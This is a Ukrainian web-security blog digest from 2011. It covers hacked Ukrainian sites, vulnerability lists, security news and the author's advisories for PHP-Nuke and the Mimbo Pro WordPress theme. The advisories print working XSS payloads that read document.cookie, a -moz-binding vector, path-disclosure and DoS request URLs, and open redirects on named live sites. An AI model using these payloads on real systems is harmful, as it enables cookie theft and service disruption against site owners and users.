Websecurity - Веб безпека

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.malyn-rada.gov.ua (хакером MCA-CRB) - взломаний державний сайт
• http://www.invest.gov.ua (хакерами з Ashiyane Digital Security Team) - 11.04.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://www.fonts2u.com (хакером ke$ha)
• http://maluk.in.ua (хакером Seif Jelidi) - 09.04.2011, зараз сайт вже виправлений адмінами
• http://www.ladiestime.com.ua (хакером SkyNet)

В даній добірці уразливості в веб додатках:

• Dlink WBR-2310 Wireless Router DoS (деталі)
• Information disclosure in IceBB (деталі)
• HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code (деталі)
• Path disclosure in IceBB (деталі)
• Simple Web Server DoS (деталі)
• Information disclosure in IceBB (деталі)
• SQL injection in IceBB (деталі)
• EMC Celerra NFS authentication bypass vulnerability using IP spoofing (деталі)
• Unauthorized access to root NFS export on EMC Celerra NAS appliance (деталі)
• AWCM v2.2 Auth Bypass Vulnerabilities (деталі)

За повідомленням hackzona.com.ua, Facebook змінює паролі користувачам з підключеним обліковим записом Hotmail.

Сервіс Facebook ініціював процес оновлення паролів користувачів, що підключили свої профілі до облікових записів Hotmail. Турецький дослідник інформаційної безпеки Серкан Генсел виявив уразливість, яка дозволяє зловмисникам отримувати паролі сторінок Facebook з підключеними обліковими записами Hotmail.

За повідомленням www.xakep.ru, хакери одержали повний доступ до серверів WordPress.com.

Позавчора стало відомо, що деякі хакери одержали root-доступ до серверів компанії Automattic, що володіє блог-хостінгом WordPress.com. За повідомленням компанії, дані VIP-кліентів також були доступні хакерам, включаючи вихідні коди сайтів. У такий спосіб крім внутрішніх документів і публікацій, хакерам стали доступні паролі й авторизаційні ключі від різних служб і акаунтів, що використовуються для інтеграції сайтів із соціальними мережами (такими, як Facebook чи Twitter), хмарними сервісами збереження й обробки даних (наприклад, Amazon S3), а також, не виключено, що приватні ключі SSL сертифікатів.

В минулому місяці, як я вже писав, на сервери WordPress.com проводилася масштабна DDoS атака. А вже в цьому місяці їх сервер взломали.

За повідомленням www.opennet.ru, Mozilla розглядає можливість випуску в 2011 році релизів Firefox 4, 5, 6 і 7.

Розробники проекту Mozilla опублікували попередній варіант плану розвитку Firefox у 2011 році. Однією з найбільш цікавих пропозицій, озвучених у плані, є істотне скорочення циклу підготовки значних релізів Firefox, що дозволить випустити протягом 2011 року релізи Firefox 4, 5, 6 і 7. Браузер Firefox 4 вже вийшов, про що я згодом напишу більш детально.

Це Mozilla вирішила взяти приклад з Google, що швидкими темпами випускає свій браузер (в минулому місяці вийшов Сhrome 10).

16.03.2011

У січні, 15.01.2011, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

15.04.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Downloads

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0). Приклад експлоіту:

PHP-Nuke XSS.html

Abuse of Functionality:

http://site/modules.php?name=Your_Account&op=pass_lost

Через даний функціонал можна виявляти логіни в системі.

Insufficient Anti-automation:

Враховучи, що в даному функціоналі немає захисту від автоматизованих атак, це дозволяє проводити автоматизоване виявлення логінів в системі (а також розсилку листів користувачам сайту). В подальшому виявлені логіни можуть бути використані для визначення паролів користувачів системи.

Уразливі PHP-Nuke 8.1 та попередні версії. Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

Продовжуючи тему редиректорів в CMS пропоную вам нову добірку редиректорів.

В даних записах я наводжу приклади редиректорів в різних CMS (та інших веб додатках). Дані уразливості можна виявити майже на всіх сайтах, що використовують зазначені системи.

Редиректори в CMS движках:

Pligg Content Management System:

• http://site/out.php?link=http://websecurity.com.ua

Вразливі лише старі версії Pligg CMS.

vBulletin (vbAnonymizer для vBulletin):

• http://domaintimes.net/forum/…?url=http://websecurity.com.ua

CMS WebManager-Pro:

• http://www.skypatrol.com.ua/…url=http://websecurity.com.ua

Продовжуючи розпочату традицію, після попереднього відео про приватність в Google Gmail, пропоную нове відео на веб секюріті тематику. Цього разу відео про приватні дані в Інтернеті. Рекомендую подивитися всім хто цікавиться цією темою.

Everyone Knows Your Name

Вже багато років я планував розповісти про це відео і ось нарешті дійшов до нього. Воно на тему приватності особистих даних, як і декілька останніх відео, про які я писав (і ця тема стає з кожним роком все більш актуальною). Це соціальна реклама на тему розповсюдження приватних даних в інтернеті.

В відео показані ризики приватності для людей, що розміщують особисті дані в Мережі (зокрема в соціальних мережах та на інших соціальних сайтах). В ньому закликається думати, що ви розміщуєте в онлайні. Рекомендую подивитися дане відео для розуміння ризиків приватності в Інтернеті.

В минулому місяці, 15.03.2011, компанія Microsoft випустила фінальну версію браузера Internet Explorer 9. Вихід нової версії відбувся через два роки після виходу IE8.

Розповім детальніше про IE9 та його покращення в плані безпеки.

Нові можливості інтерфейсу IE9 включають:

• Минималистичный інтерфейс заощаджує місце на екрані, дозволяючи бачити сайт, а не панелі браузера.
• Інтелектуальний адресний рядок з функцією One Box - це єдине поле для переходу до конкретного сайту чи для пошуку.
• Користувач може розміщати вкладки на одній панелі разом з адресним рядком, а може переносити їх на окремий рядок, забезпечуючи більше місця відкритим вкладкам.
• З функцією закріплення сайтів на панелі задач на улюблені сторінки можна зайти одним кликом, не відкриваючи попереднє вікно браузера.
• Списки переходів надають простий і швидкий спосіб переходу до окремої задачі веб-сайта, будь те створення поштового повідомлення, перевірка вхідних листів чи публікація коментарю.
• Поліпшена навігація по вкладках з функцією Windows Aero Snap.
• Розширена підтримка стандартів HTML5, SVG, CSS3, ECMAScript 5 і DOM.

Серед нових можливостей браузера для забезпечення безпеки та приватності в Мережі:

• На додаток до функцій InPrivate Browsing та InPrivate Filtering, доступним ще в Internet Explorer 8, Internet Explorer 9 підсилює захист конфіденційної інформації за допомогою технології “Захист від спостереження” (Tracking Protection). Завдяки їй користувач може вказувати, які дані про нього можуть бути передані сторонніми сайтам.
• Функція Hang Recovery. Нова можливість Internet Explorer 9 служить для обмеження наслідків зависання вкладки: якщо одна з вкладок перестає відповідати, інші вкладки і весь браузер продовжують роботу.
• Функція ActiveX Filtering. Технологія ActiveX дозволяє розробникам додатків створювати інтерактивний контент сайтів, але так само може становити небезпеку для користувацьких даних. Internet Explorer 9 дозволяє заблокувати можливості ActiveX для всіх сайтов, за винятком перевірених.
• Перегляд у режимі сумісності. Якщо браузер виявляє веб сайт, на якому не зазначений кращий режим відображення, в адресному рядку відображається кнопка перегляду в режимі сумісності.
• Автоматичне оновлення браузера.
• Підтримка групової політики.

По матеріалам http://www.thg.ru.

08.02.2011

У лютому, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Mimbo Pro для WordPress. Це комерційний шаблон для WP. Ця тема розроблена автором TimThumb, який і використовується в ній. Уразливості я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темах Live Wire 2.0 та Live Wire Style для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

14.04.2011

XSS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/mimbopro/

А також ще десятки php-скриптів шаблону в папці /mimbopro/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Уразливі Mimbo Pro 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив майже всі уразливості.

Серед цікавих векторів XSS атак, на які недостатньо звертають увагу веб розробники, є атаки на форми де використовуються різноманітні rich редактори (або коли веб розробники візуалізують дані в формах подібно до rich редакторів чи використовують AJAX). Cross-Site Scripting уразливості в таких формах можуть мати місце навіть при наявності фільтрації вхідних та віхідних даних.

До rich редакторів відносяться FCKeditor, CKEditor (це назва FCKeditor починаючи з третьої версії), TinyMCE та інші. Які додаються до форм, щоб надати користувачам можливості візульної обробки даних. А також подібні XSS уразливості можуть мати місце в веб додатках, що візуалізують контент.

Суть уразливості зводиться до того, що веб додаток (rich редактор або інший веб додаток) візуалізує отримані дані (вони можуть бути отримані від користувача, або з БД, куди вони були занесі так чи інакше від користувача). І навіть якщо у веб додатку є фільтрація вхідних і/або вихідних даних, коли спеціальні html символи замінюються на їхні сутності, це можна обійти і виконати XSS код. Для цього потрібно використати тег img та відповідний обробник (onerror чи onload).

За допомогою даного коду можна провести XSS атаку на подібні веб додатки. Тег img буде візуалізований в зображення і при цьому виконається код в браузері користувача:

<img src=’1′ onerror="javascript:alert(document.cookie)">

Про подібні уразливості я неодноразово писав за останні 4 роки: стосовно persistent XSS (в Relay та Drupal) та reflected XSS (в Relay, PHP-Nuke та Drupal). А також неодноразово зустрічав подібні дірки на різних сайтах. Враховуючи поширеність вищезгаданих веб додатків, дані уразливості стосуються мільйонів сайтів.

Продовжу своє дослідження безпеки e-commerce сайтів в Уанеті.

Веб сайти, що займаються електронною комерцією (e-commerce), повинні дбати про свою безпеку. Бо вони заробляють гроші на своїй онлайн діяльності і будь-які проблеми з безпекою на їх сайтах можуть їм коштувати фінансових втрат.

Але нажаль e-commerce сайти в Уанеті достатньо діряві, бо власники цих сайтів за безпекою особливо не слідкують.

В себе в новинах я писав про уразливості на наступних сайтах онлайн магазинів, обмінників електронних валют, веб брокерів та електронних платіжних систем (України та Росії):

• www.foxtrot.com.ua
• exwp.com
• www.prospero.ru та procontext.ru
• LiqPAY
• www.propage.ru

Також згадував про взломані онлайн магазини та e-commerce сайти в Уанеті:

• atta.zp.ua
• www.wm-change.in.ua
• www.x-change.in.ua
• www.pincode.biz.ua
• www.soundpress.biz
• shop.m-sport.com.ua
• kolight.org.ua
• www.luxuryhouse.com.ua
• www.be-be.com.ua
• domus.biz.ua
• shop.prodecoupage.com

А також згадував про інфіковані онлайн магазини та e-commerce сайти в Уанеті:

• belkosmetik.com.ua
• kupi-rashodniki.net
• kanduk.com.ua

Так що українським e-commerce сайтам (та сайтам інших країн) є куди покращувати свою безпеку.